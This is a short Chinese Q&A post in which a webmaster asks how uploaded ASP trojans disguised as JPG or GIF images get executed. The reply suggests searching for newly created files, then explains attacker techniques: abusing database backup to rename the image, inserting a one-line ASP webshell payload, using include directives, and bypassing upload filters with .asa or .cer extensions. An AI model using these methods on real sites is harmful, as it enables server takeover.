asp做成的图片木马怎么执行？

<p>&nbsp;&nbsp;&nbsp; 我的网站被上传了jpg或gif各式的asp木马，但在通过url打开的时候并不执行程序，查看源代码发现还是&lt;%%&gt;这样的，请问上传者是怎么执行图片木马得？</p><p>&nbsp;&nbsp;&nbsp; 估计你的后台已经被攻破，攻击者上传图片木马后，利用数据库备份等功能，把图片木马，备份（另存为）asp了。<br />你可以尝试着搜索一下 创建时间在那两个木马图片之后的所有文件，然后检查一下是否有木马。</p><p>&nbsp;&nbsp;&nbsp; 如果后台没有类似数据库备份功能，可以生成新文件，或者直接修改文件。那么很难直接让木马运行，不过还是有一些方法，可以考虑。<br />1、如果后台数据库是以asp格式存储的。那么可以采用在数据库中插入一句话木马(&lt;%execute&nbsp; request("1")%&gt;)，然后利用一句话木马上传一个完整木马。<br />2、如果网站后台允许修改网站联系信息等页面，而且页面也是也是以asp存储，那么可以利用asp的包含文件，巧妙的令jpg、bmp等格式木马得以运行。比如在其中插入<br />&lt;!-- #include file=/upload/****.jpg --&gt;<br />3、还可以看看网站上传类型是否有严格的过滤，如果仅仅是限制了asp文件，那么可以尝试上传asa、cer等等。</p>